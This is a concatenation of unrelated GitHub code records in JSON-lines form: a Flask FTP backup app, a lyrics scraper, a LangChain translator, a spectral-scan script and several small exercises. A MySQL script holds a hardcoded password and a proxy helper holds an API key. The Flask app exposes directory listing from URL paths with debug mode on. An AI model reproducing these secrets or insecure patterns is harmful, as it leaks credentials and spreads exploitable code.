random.choice(data)\n# score variable\nscore = 0\n# while not end of game:\nwhile not end_of_game:\n    # initial print statements, main logo, item 1, vs logo, item 2\n    print(f\"Compare A: {item1['name']}, a {item1['description']}, from {item1['country']}.\")\n    print(vs)\n    print(f\"Against B: {item2['name']}, a {item2['description']}, from {item2['country']}.\")\n    # user input of item1 or item 2.\n    more_followers = input(\"Who has more followers? Type 'A' or 'B': \")\n    # compare A and B follower count, if correct choice score += 1, else end of game true and print final score. \n    # if correct new item 2 assignment and assign item 2 to item 1. \n    if item1['follower_count'] > item2['follower_count'] and more_followers == 'A':\n        score += 1\n        item1 = item2\n        item2 = random.choice(data)\n        print(f\"You're right! Current score: {score}\")\n    # elif item1 > item2 and input = B\n    elif item1['follower_count'] > item2['follower_count'] and more_followers == 'B':\n        print(f\"Sorry, that's wrong. Final score: {score}\")\n        end_of_game = True\n    # elif item1 < item2 and input = A\n    elif item1['follower_count'] < item2['follower_count'] and more_followers == 'A':\n        print(f\"Sorry, that's wrong. Final score: {score}\")\n        end_of_game = True\n    # else item1 < item2 and input = B \n    else:\n        score += 1\n        item1 = item2\n        item2 = random.choice(data)\n        print(f\"You're right! Current score: {score}\")\n","repo_name":"Deipied/100days","sub_path":"day11-20/day14/day14_higher_lower_game.py","file_name":"day14_higher_lower_game.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12911003618","text":"from flask import Flask\r\nfrom flask import render_template, redirect, request\r\nfrom ftplib import FTP\r\nimport os\r\nfrom backup_utils import *\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\nftp = [None]\r\n# Checking 404 error\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n\treturn \"Nothing found. Try something else.\"
\r\n\r\n@app.route(\"/\", methods=[\"GET\"])\r\ndef home_page():\r\n\treturn render_template(\"index.html\", invalid=False)\r\n\r\n@app.route(\"/set_ftp_address\", methods=[\"POST\"])\r\ndef set_ftp_address():\r\n\tftp_address = request.form['ftp_address']\r\n\tsuccess = False\r\n\ttry:\r\n\t\tx = FTP(ftp_address)\r\n\t\tx.login(request.form['user'], request.form['pass'])\r\n\t\tftp[0] = x\r\n\t\tsuccess = True\r\n\texcept:\r\n\t\tpass\r\n\tif not success:\r\n\t\treturn render_template(\"index.html\", invalid=True)\r\n\telse:\r\n\t\treturn redirect(\"/view_files\")\r\n\r\n@app.route(\"/view_files\", methods=[\"GET\"])\r\ndef view_files():\r\n\treturn render_template(\r\n\t\t\t\t\t\t\t\"view_files.html\", \r\n\t\t\t\t\t\t\tshow_datasets=False,\r\n\t\t\t\t\t\t\tshow_backups=False,\r\n\t\t\t\t\t\t\tdatasets_listdir=[],\r\n\t\t\t\t\t\t\tbackups_listdir=[],\r\n\t\t\t\t\t\t\tdatasets_currdir='.',\r\n\t\t\t\t\t\t\tbackups_currdir='.',\r\n\t\t\t\t\t\t)\r\n\r\n@app.route(\"/view_files/datasets/<path>\", methods=[\"GET\"])\r\ndef view_datasets(path):\r\n\tpath = path.replace('+','/')\r\n\tupper_dir = os.path.split(path)[0]\r\n\tif upper_dir=='':\r\n\t\tupper_dir = path\r\n\tdatasets_listdir = [(upper_dir.replace('/','+'),True)]+[(i[0],i[1]['type']=='dir') for i in ftp[0].mlsd(path)]\r\n\treturn render_template(\r\n\t\t\t\t\t\t\t\"view_files.html\", \r\n\t\t\t\t\t\t\tshow_datasets=True,\r\n\t\t\t\t\t\t\tshow_backups=False,\r\n\t\t\t\t\t\t\tdatasets_listdir=datasets_listdir,\r\n\t\t\t\t\t\t\tbackups_listdir=[],\r\n\t\t\t\t\t\t\tdatasets_currdir=path.replace('/','+'),\r\n\t\t\t\t\t\t\tbackups_currdir='.',\r\n\t\t\t\t\t\t)\r\n\r\n@app.route(\"/view_files/backups/<path>\", methods=[\"GET\"])\r\ndef view_backups(path):\r\n\tpath = path.replace('+','/')\r\n\tupper_dir = os.path.split(path)[0]\r\n\tif upper_dir=='':\r\n\t\tupper_dir = path\r\n\tbackups_listdir = [upper_dir.replace('/','+')]+os.listdir(path)\r\n\tbackups_listdir = [(i,os.path.isdir(os.path.join(path,i))) for i in backups_listdir]\r\n\treturn render_template(\r\n\t\t\t\t\t\t\t\"view_files.html\", \r\n\t\t\t\t\t\t\tshow_datasets=False,\r\n\t\t\t\t\t\t\tshow_backups=True,\r\n\t\t\t\t\t\t\tdatasets_listdir=[],\r\n\t\t\t\t\t\t\tbackups_listdir=backups_listdir,\r\n\t\t\t\t\t\t\tdatasets_currdir='.',\r\n\t\t\t\t\t\t\tbackups_currdir=path.replace('/','+'),\r\n\t\t\t\t\t\t\tis_valid_backup=(os.path.split(path)[0]=='backup_folder'),\r\n\t\t\t\t\t\t)\r\n\r\n@app.route(\"/backup/<path>\", methods=[\"GET\"])\r\ndef backup_form(path):\r\n\treturn render_template(\"make_backup.html\", dataset_path=path.replace('+','/'))\r\n\r\n@app.route(\"/backup\", methods=[\"POST\"])\r\ndef backup():\r\n\tdataset_path = request.form['dataset_path']\r\n\tfull = False\r\n\tif 'full' in request.form:\r\n\t\tfull = request.form['full']=='on'\r\n\tdataset_name = os.path.split(dataset_path)[-1]\r\n\tmake_backup(ftp[0], f'backup_folder/{dataset_name}', dataset_path, full)\r\n\treturn redirect(\"/view_files\")\r\n\r\n@app.route(\"/recover/<path>\", methods=[\"GET\"])\r\ndef recover_form(path):\r\n\tpath = path.replace('+','/')\r\n\tdataset_name = os.path.split(path)[1]\r\n\treturn render_template(\"recover.html\", backup_path=path, dataset_path=f'dataset_folder/{dataset_name}', out_folder=f'dataset_folder/{dataset_name}_recovered')\r\n\r\n@app.route(\"/recover\", methods=[\"POST\"])\r\ndef recover():\r\n\tbackup_path = request.form['backup_path']\r\n\tdataset_path = request.form['dataset_path']\r\n\tout_folder = request.form['out_folder']\r\n\treq_time = datetime(*list(map(int, 
(request.form['req_time']).split(' '))))\r\n\trecover_backup(ftp[0], backup_path, dataset_path, out_folder, req_time=req_time)\r\n\treturn redirect(\"/view_files\")\r\n\r\nif __name__ == \"__main__\":\r\n # app.run(host=\"0.0.0.0\", port=6000, debug=True)\r\n app.run(debug=True)\r\n\t# app.run()","repo_name":"Tanmay-Garg01/Backup-and-Backup-Policy","sub_path":"src/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4417699979","text":"from typing import Optional\nfrom validation.validate import required_keys_present, values_correct_type\n\n\ndef validate(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/assessments post request\n is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n {\n \"dateAssessed\": 1551447833, - required\n \"diagnosis\": \"patient is fine\",\n \"medicationPrescribed\": \"tylenol\",\n \"specialInvestigations\": \"bcccccccccddeeeff\",\n \"treatment\": \"b\",\n \"followupNeeded\": True, - required\n \"followupInstructions\": \"pls help, give lots of tylenol\" - required if followupNeeded = True\n }\n\n :return: An error message if request body in invalid in some way. None otherwise.\n \"\"\"\n error_message = None\n\n # Check if required keys are present\n required_keys = [\n \"followupNeeded\",\n \"dateAssessed\",\n ]\n error_message = required_keys_present(request_body, required_keys)\n if error_message is not None:\n return error_message\n\n # If patient has followupNeeded set to True, make sure followupInstructions is filled in\n if request_body.get(\"followupNeeded\") == True:\n error_message = required_keys_present(request_body, [\"followupInstructions\"])\n if error_message is not None:\n return error_message\n\n # Check that certain fields are of type int\n error_message = values_correct_type(request_body, [\"dateAssessed\"], int)\n if error_message is not None:\n return error_message\n\n return error_message\n","repo_name":"drbfraser/CRADLE-Platform","sub_path":"server/validation/assessments.py","file_name":"assessments.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"33513299432","text":"import pytest\n\nfrom billing_fin_payouts.models.payments import payment as payment_models\nfrom billing_fin_payouts.stq import process_payouts\nfrom . import stq_payout_common_utils\n\n\n@pytest.mark.config(BILLING_FIN_PAYOUTS_STQ_PROCESS_PAYOUTS_ENABLED=True)\n@pytest.mark.parametrize(\n \"\"\"\n static_data, dry_run_flag\n \"\"\",\n [('10_static_data.json', False), ('20_static_data.json', True)],\n ids=[\n 'skip_payout_10_payment_more_than_refund',\n 'skip_payout_20_payment_more_than_refund_DRY',\n ],\n)\nasync def test_20_process_payouts_nett_skip_task(\n stq3_context,\n load_json,\n static_data,\n dry_run_flag,\n interface_table='interface.revenues',\n):\n \"\"\"\n 10. payment & refund of service_id = 650 (SKIP_PAYOUT) and payment\n 20. 
payment & refund of service_id = 650 (SKIP_PAYOUT) and payment DRY\n \"\"\"\n\n pool = await stq3_context.pg.master_pool\n\n data_json = load_json(static_data)\n interface_list = [{interface_table: data_json['revenues']}]\n\n await stq_payout_common_utils.load_data(\n pool=pool, interface_list=interface_list,\n )\n\n task_info = stq_payout_common_utils.build_task_info(\n dry_run=dry_run_flag,\n payment_processor=payment_models.PaymentProcessor.OEBS,\n )\n # run task\n await process_payouts.task(\n stq3_context, task_info=task_info, client_id='1349515601',\n )\n\n await stq_payout_common_utils.check_results(pool=pool, data_json=data_json)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_billing_fin_payouts/stq/test_20_process_payouts_nett_skip.py","file_name":"test_20_process_payouts_nett_skip.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71107762772","text":"import requests\n\ndef get_proxy():\n # response = requests.get(\"https://api.getproxylist.com//proxy?apiKey=62e9cf6f693a1701c2ba9497f712fb048064bc46&country=ID&protocol=http\")\n # json_response = response.json()\n # print(json_response)\n proxies = {\n 'http': f'128.199.202.122:8080',\n # 'https': f'http://{json_response[\"ip\"]}:{json_response[\"port\"]}',\n }\n print(proxies)\n return proxies","repo_name":"masnasri-a/FollowersCount","sub_path":"util/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37554502501","text":"def normalizeUsers( p ):\n\n db = p.db\n\n authUsers = db( db.auth_user.id > 0 ).select( orderby = db.auth_user.last_name )\n\n for user in authUsers:\n\n if( db( db.unique_user.last_name == user.last_name ).count() == 0 ):\n\n uniqueUserId = db.unique_user.insert( first_name = user.first_name, last_name = user.last_name )\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = uniqueUserId )\n\n elif( db( ( db.unique_user.last_name == user.last_name ) &\n ( db.unique_user.first_name == user.first_name) ).count() == 1 ):\n\n uniqueUserId = db( ( db.unique_user.last_name == user.last_name ) &\n ( db.unique_user.first_name == user.first_name) ).select()[0].id\n\n if( db( ( db.user_map.unique_user_id == uniqueUserId ) &\n ( db.user_map.auth_user_id == user.id ) ).count() == 0 ):\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = uniqueUserId )\n\n else:\n\n sameLastNames = db( db.unique_user.last_name == user.last_name ).select()\n\n found = False\n\n for person in sameLastNames:\n\n if( ( person.first_name in user.first_name ) or\n ( user.first_name in person.first_name ) ):\n\n found = True\n\n if( db( ( db.user_map.unique_user_id == person.id ) &\n ( db.user_map.auth_user_id == user.id ) ).count() == 0 ):\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = person.id )\n\n break\n\n if( found == False ):\n\n uniqueUserId = db.unique_user.insert( first_name = user.first_name, last_name = user.last_name )\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = uniqueUserId )\n","repo_name":"nonumberjim/PhylografterNeo4j","sub_path":"modules/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"37686559980","text":"import argparse\nimport lyricsgenius\nimport pandas as pd\nimport 
time\nimport sys\nfrom dataset_utils import loop_and_process, name_to_file_name, read_list_from_file\nfrom genius import GENIUS_ACCESS_TOKEN\n\nraw_songs_dir = 'RAW_SONGS_DONT_DELETE'\nartist_song_split_token = ' | '\n\nartist_lyric_dir = 'raw_artist_lyrics'\n\ndef instantiate_genius():\n    genius = lyricsgenius.Genius(GENIUS_ACCESS_TOKEN, timeout=30)\n    genius.excluded_terms = [\"Remix\", \"Live\", \"Intro\", \"Outro\", \"Freestyle\", \"Demo\", \"Interlude\", \"Snippet\", \"Excerpts\", \"Medley\", \"MTV\", \"Radio\", \"Edit\", \"Skit\", \"Discography\"]\n    return genius\n\ndef get_songs(name=None, csv=None):\n    artists = []\n    if csv is not None:\n        print(\"\\n Getting lyrics for all artists in {}\".format(csv))\n        with open(csv) as openfile:\n            artists = openfile.readlines()\n        artists = [artist.strip() for artist in artists]\n    elif name is not None:\n        print(\"\\n Getting lyrics for {}\".format(name))\n        artists = [name]\n    else:\n        print(\"No Input Artists\")\n    while len(artists) > 0:\n        try:\n            genius = instantiate_genius()\n            # functions\n            def process_artist(name, bar):\n                artist = genius.search_artist(name)\n                songs = artist.songs\n                def process_song(song, bar):\n                    return {\n                        'title': song.title,\n                        'artist': song.artist,\n                        'lyrics': song.lyrics,\n                        'featured_artists': [a['name'] for a in song.featured_artists]\n                    }\n                def get_song_name(song):\n                    return song.artist + artist_song_split_token + song.title\n                loop_and_process(songs, process_song, \"Song\", get_song_name, raw_songs_dir)\n                return None\n            def get_artist_name(name):\n                return name\n            loop_and_process(\n                artists,\n                process_artist,\n                \"Artist\",\n                get_artist_name,\n                artist_lyric_dir,\n            )\n        except:\n            e = sys.exc_info()[0]\n            print(e)\n        finally:\n            completed_artists = read_list_from_file(\"{}/{}\".format(artist_lyric_dir, \"_LIST\"))\n            for artist in completed_artists:\n                if artist in artists:\n                    artists.remove(artist)\n\nif __name__ == \"__main__\":\n    get_songs(csv='get_artists.csv')\n\n","repo_name":"Lucaskabela/artist-lyric-gen","sub_path":"src/dataset/get_songs.py","file_name":"get_songs.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37686559980","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom typing import *\nimport numpy as np\n\n# create a function which plots sine waves\ndef plot_sine_waves(sine_waves_dict: List[dict], title: str, missing_values: List[np.ndarray] = [], xlabel: str = 'time', ylabel: str = 'amplitude', style: str = 'darkgrid', figsize: tuple = (12, 6), rows: int = 3, columns: int = 1):\n    \n    # add figsize\n    plt.figure(figsize=figsize)\n    \n    # plot the function\n    sns.set_style(style)\n    \n    for i in range(len(sine_waves_dict)):\n        \n        # get the current time series vector\n        f = sine_waves_dict[i]\n        \n        sns.lineplot(**f)\n        \n        sns.scatterplot(**f)\n        \n        # plot imputed values if indicated at the current index\n        try:\n            \n            imputed_values = f['data'].copy()\n            \n            imputed_values[~missing_values[i]] = np.nan\n            \n            # sns.lineplot(imputed_values, color = 'red', label = 'missing')\n            \n            sns.scatterplot(imputed_values, color = 'red', label = 'imputed')\n        \n        except:\n            \n            pass \n    \n    # add title\n    plt.title(title)\n    \n    # add labels\n    plt.xlabel(xlabel)\n    \n    plt.ylabel(ylabel)\n    \n    # add legend\n    if len(sine_waves_dict) > 1:\n        \n        plt.legend()\n    \n    plt.show()\n 
\n","repo_name":"Oumar199/Climatic_time_series","sub_path":"climatic-time-series/climatic_time_series/utils/plot_lines.py","file_name":"plot_lines.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16882043632","text":"from langchain.chat_models import ChatOpenAI\nfrom langchain.llms import ChatGLM\nfrom langchain.chains import LLMChain\nfrom langchain import PromptTemplate\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n)\n\nfrom utils import LOG\n\n\nclass TranslationChain:\n def __init__(\n self,\n model_name: str = \"gpt-3.5-turbo\",\n glm_endpoint: str = \"http://127.0.0.1:8000\",\n verbose: bool = True,\n ):\n # 初始化 OpenAI 模型的 chain\n self.init_openai_chain(model_name, verbose)\n # 初始化 GLM 模型的 chain\n self.init_glm_chain(glm_endpoint, verbose)\n\n def init_openai_chain(self, model_name, verbose):\n # 创建小说风格的翻译 chain,将 temperature 设置为 0.3,保持一定的变化\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translate the following content from {source_language} to {target_language} using novel style.\"\"\"\n self.openai_novel_style_chain = self.generate_openai_chain(\n system_prompt, 0.3, model_name, verbose\n )\n\n # 创建新闻稿风格的翻译 chain,将 temperature 设置为 0,以保持翻译结果的稳定性\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translate the following content from {source_language} to {target_language} using the style of a press release.\"\"\"\n self.openai_press_style_chain = self.generate_openai_chain(\n system_prompt, 0, model_name, verbose\n )\n\n # 创建文艺作家风格的翻译 chain,将 temperature 设置为 0.7,让翻译内容多变\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translate the following content from {source_language} to {target_language} using the style of a literary writer.\"\"\"\n self.openai_literary_style_chain = self.generate_openai_chain(\n system_prompt, 0.7, model_name, verbose\n )\n\n # 创建无风格的翻译 chain,将 temperature 设置为 0,以保持翻译结果的稳定性\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. 
\\n\n            Translates {source_language} to {target_language}.\"\"\"\n        self.openai_none_style_chain = self.generate_openai_chain(\n            system_prompt, 0, model_name, verbose\n        )\n\n    def generate_openai_chain(\n        self,\n        system_prompt,\n        temperature,\n        model_name,\n        verbose,\n    ) -> LLMChain:\n        # the translation-task instruction is always carried by the System role\n        system_message_prompt = SystemMessagePromptTemplate.from_template(system_prompt)\n\n        # the text to translate comes in through the Human role\n        human_template = \"{text}\"\n        human_message_prompt = HumanMessagePromptTemplate.from_template(human_template)\n\n        # build the ChatPromptTemplate from the System and Human prompt templates\n        chat_prompt_template = ChatPromptTemplate.from_messages(\n            [system_message_prompt, human_message_prompt]\n        )\n\n        chat = ChatOpenAI(\n            model_name=model_name, temperature=temperature, verbose=verbose\n        )\n        return LLMChain(llm=chat, prompt=chat_prompt_template, verbose=verbose)\n\n    def init_glm_chain(self, endpoint, verbose):\n        # create the novel-style translation chain; set temperature to 3 to keep some variability (GLM's temperature range is 0~10)\n        prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language},尽量使用小说文体的措辞风格:\\n{text}\"\"\"\n        self.glm_novel_style_chain = self.generate_glm_chain(\n            prompt_str, 3, endpoint=endpoint, verbose=verbose\n        )\n\n        # create the press-release-style translation chain; set temperature to 0 to keep the translation stable\n        prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language},尽量使用新闻稿的措辞风格:\\n{text}\"\"\"\n        self.glm_press_style_chain = self.generate_glm_chain(\n            prompt_str, 0, endpoint=endpoint, verbose=verbose\n        )\n\n        # create the literary-writer-style translation chain; set temperature to 7 for more varied output\n        prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language},尽量使用文艺作家的措辞风格:\\n{text}\"\"\"\n        self.glm_literary_style_chain = self.generate_glm_chain(\n            prompt_str, 7, endpoint=endpoint, verbose=verbose\n        )\n\n        # create the style-free translation chain; set temperature to 0 to keep the translation stable\n        prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language}:\\n{text}\"\"\"\n        self.glm_none_style_chain = self.generate_glm_chain(\n            prompt_str, 0, endpoint=endpoint, verbose=verbose\n        )\n\n    def generate_glm_chain(\n        self,\n        prompt_str,\n        temperature,\n        endpoint,\n        verbose,\n    ) -> LLMChain:\n        # GLM has no system role, so a plain PromptTemplate wrapper is enough\n        prompt = PromptTemplate.from_template(prompt_str)\n        chat = ChatGLM(endpoint_url=endpoint, temperature=temperature, verbose=verbose)\n        return LLMChain(llm=chat, prompt=prompt, verbose=verbose)\n\n    def run(\n        self,\n        text,\n        source_language,\n        target_language,\n        style,\n        model: str = \"OpenAI\",\n    ) -> (str, bool):\n        result = \"\"\n        try:\n            if model == \"OpenAI\":\n                # translate with the OpenAI model\n                result = self.run_openai(text, source_language, target_language, style)\n            else:\n                # translate with the GLM model\n                result = self.run_glm(text, source_language, target_language, style)\n\n            LOG.debug(f\"translation result: {result}\")\n        except Exception as e:\n            LOG.error(f\"An error occurred during translation: {e}\")\n            return result, False\n\n        return result, True\n\n    def run_openai(\n        self,\n        text,\n        source_language,\n        target_language,\n        style,\n    ):\n        if style == \"小说\":\n            LOG.debug(f\"openai novel style translation\")\n            return self.openai_novel_style_chain.run(\n                {\n                    \"text\": text,\n                    \"source_language\": source_language,\n                    \"target_language\": target_language,\n                }\n            )\n        elif style == \"新闻稿\":\n            LOG.debug(f\"openai press style translation\")\n            return self.openai_press_style_chain.run(\n                {\n                    \"text\": text,\n                    \"source_language\": source_language,\n                    \"target_language\": target_language,\n                }\n            )\n        elif style == \"文艺作家\":\n            LOG.debug(f\"openai literary style translation\")\n            return 
self.openai_literary_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n else:\n LOG.debug(f\"openai none style translation\")\n return self.openai_none_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n\n def run_glm(\n self,\n text,\n source_language,\n target_language,\n style,\n ):\n if style == \"小说\":\n LOG.debug(f\"glm novel style translation\")\n return self.glm_novel_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n elif style == \"新闻稿\":\n LOG.debug(f\"glm press style translation\")\n return self.glm_press_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n elif style == \"文艺作家\":\n LOG.debug(f\"glm literary style translation\")\n return self.glm_literary_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n else:\n LOG.debug(f\"glm none style translation\")\n return self.glm_none_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n","repo_name":"991glasses/llm-learning-homework","sub_path":"langchain/openai-translator/ai_translator/translator/translation_chain.py","file_name":"translation_chain.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32998024554","text":"from pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom picamera import PiCamera\nfrom datetime import datetime\n\n\ngauth = GoogleAuth()\ngauth.LoadCredentialsFile(\"mycreds.txt\")\nif gauth.credentials is None:\n gauth.LocalWebserverAuth()\nelif gauth.access_token_expired:\n gauth.Refresh()\nelse:\n gauth.Authorize()\ngauth.SaveCredentialsFile(\"mycreds.txt\")\n\ndrive = GoogleDrive(gauth)\ncamera = PiCamera()\n\nfilename = datetime.now().strftime(\"%H%M%S\")+'.jpg'\nprint(filename)\ncamera.capture('/home/pi/Desktop/'+filename)\n\nfile1 = drive.CreateFile()\nfile1.SetContentFile(filename)\nfile1.Upload()\n","repo_name":"siba987/chef","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17656911516","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Linked_list:\n def __init__(self):\n self.head = None\n self.tail = None\n \n def find_k(self):\n curr = self.head\n\n k_curr = self.head\n\n for _ in range(6):\n if k_curr == None:\n return None\n k_curr = k_curr.next\n \n while k_curr is not None:\n k_curr = k_curr.next\n curr = curr.next\n\n return curr.data\n ","repo_name":"Chris940915/study_algorithm","sub_path":"코딩 인터뷰 완전 분석/02 Linked_list/2_2.py","file_name":"2_2.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22621094074","text":"from collections import Counter\n\n#import nltk\nfrom konlpy.corpus import kolaw\nfrom konlpy.tag import *\nfrom konlpy.utils import concordance, pprint\nimport MySQLdb\nimport matplotlib \nmatplotlib.use('Agg')\n\ndb = MySQLdb.connect(host=\"localhost\", user =\"ice-kms\", passwd=\"kkms1234\", db=\"scraping\", 
charset='utf8')\ncursor = db.cursor(MySQLdb.cursors.DictCursor)\ncursor.execute(\"set names utf8\")\n\ndb.query(\"set character_set_connection=utf8;\")\ndb.query(\"set character_set_server=utf8;\")\ndb.query(\"set character_set_client=utf8;\")\ndb.query(\"set character_set_results=utf8;\")\ndb.query(\"set character_set_database=utf8;\")\n\ncursor.execute(\"set names utf8\")\nsql = \"select Content from Test3 where Articlenumber=5\"\ncursor.execute(sql.encode('utf8'))\n\nrows = cursor.fetchall()\n\ndocument2 = ''\n\nfor row in rows:\n\tprint(row['Content'].decode('utf8'))\n\tdocument2 = document2 + row['Content'].decode('utf8')\n\n#print(document2)\n\npos = Twitter().pos(document2+\"'문재인은 바보이다'\")\nprint(pos)\narray = []\n\n#cnt = Counter(pos)\nfor poss in pos:\n\tif poss[1] == \"Noun\" or poss[1] == \"Number\":\n\t\tarray.append(poss[0])\n\nprint(array)\n\n#print('nchars :', len(document2))\n#print('ntokens :', len(document2.split()))\n#print('nmorphs :', len(set(pos)))\n#print('\\nTop 50 frequent morphemes:'); pprint(cnt.most_common(30))\n#ko = nltk.Text(pos, name='명사추출')\n##output_file = open('pos0.txt', 'w')\n##for row in cnt.most_common(3000):\n##\toutput_file.write(str(row)+'\\n')\n\n##output_file.close()\n#ko.vocab()\n#ko.plot(50)\n#ko.savefig('word.png')\n#ko.show()\n#x = pos\n#y = cnt\n#plt.plot(x,y)\n#plt.show()\n","repo_name":"JeongHyeon-Kim/Extracting-Representative-Keyword-with-LDA-and-Word-Distance","sub_path":"Pre-processing/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11954902445","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 29 17:19:19 2016\n\n@author: olbrich\n\"\"\"\n#import os\nimport time\nimport queue\nimport numpy as np\nfrom psd import scanner as psd_scanner\nfrom psd import helper as psd_helper\nfrom psd import plotter as psd_plotter\n\n\n# define scan params\niface = 'wlan0'\nrunt = 30\nival = 0.05\ndebug = False\nspectral_mode = 'background' # 'background', 'manual'\nspectral_count = 8 # default=8\nspectral_period = 255 # default=255, max=255\nspectral_fft_period = 15 # default=15, max=15\nspectral_short_repeat = 1 # default=1\n\n\n# configure scan device\npsd_helper.scan_dev_configure(\n    iface=iface,\n    mode=spectral_mode,\n    count=spectral_count,\n    period=spectral_period,\n    fft_period=spectral_fft_period,\n    short_repeat=spectral_short_repeat\n)\n\n# set timer\nstart_time = time.time()\nend_time = start_time + runt\n\n# create plotter object\nplt = psd_plotter.Plotter()\n\n# create scanner queue\npsdq = queue.Queue()\n\n# start scan\nprint(\"Start scanning PSD for %d sec in %.2f sec intervals on interface %s...\" % (runt, ival, iface))\nif (spectral_mode == 'background'):\n    psd_helper.scan_dev_start(iface)\n\nival_cnt = 0\nwhile time.time() < end_time:\n\n    if (spectral_mode == 'manual'):\n        psd_helper.scan_dev_start(iface)\n\n    # start scanner in a separate thread???\n    psd_scanner.scan(iface, psdq, debug)\n\n    # collect all samples from last scan interval\n    qsize = psdq.qsize()\n    print(\"ival_cnt: %d, qsize: %d\" % (ival_cnt, qsize))\n    ret = np.full((56, qsize), (np.nan), dtype=np.float64)\n\n    #while not myQueue.empty():\n    #psd_pkt = myQueue.get()\n    #print(\"Receiving PSD header: %s\" % psd['header'])\n\n    for i in range(0, qsize, 1):\n        psd_pkt = psdq.get()\n        ret[:,i] = psd_pkt['psd_vector']\n\n    # calculate statistics for last scan interval\n    avg = 10*np.log10(np.mean(10**np.divide(ret, 10), axis=1))\n    
env = np.max(ret, axis=1)\n\n if debug:\n print(\"Average power spectrum of last %d samples (%d sec):\" % (qsize, ival))\n np.set_printoptions(formatter={'float': '{: 0.1f}'.format}, linewidth=120)\n print(avg)\n\n print(\"Envelope power spectrum of last %d samples (%d sec):\" % (qsize, ival))\n np.set_printoptions(formatter={'float': '{: 0.1f}'.format}, linewidth=120)\n print(env)\n\n # update plotter\n plt.updateplot(avg, env)\n\n # sleep for ival seconds\n ival_cnt += 1\n time.sleep(ival)\n\n# stop scan\npsd_helper.scan_dev_stop(iface)\n","repo_name":"kotobuki09/Fab_OpenVLC","sub_path":"Tx_Full_Repo/work/dev/lib/python3.7/site-packages/wishful_module_spectral_scan_ath9k/test_psd_scanner.py","file_name":"test_psd_scanner.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"15842891180","text":"import os, sys\nsys.path.append(os.path.abspath('../../Hall-effekt/src/'))\nfrom PRELABOppgave1 import EvaluatePoints\nfrom numpy import exp, log, array\nfrom matplotlib.pylab import plot, show, xlabel, ylabel, title, savefig\n\nU_list = array([8.9110, 7.0, 5.5, 4.35, 3.44, 2.70, 2.1, 1.65, 1.32, 1.05,\\\n 0.81, 0.65, 0.515, 0.410, 0.324, 0.256, 0.204, 0.161, 0.128])\nt_list = array([0, 20, 40, 60, 80, 100, 120, 140, 160, 180, 200, 220,\\\n 240, 260, 280, 300, 320, 340, 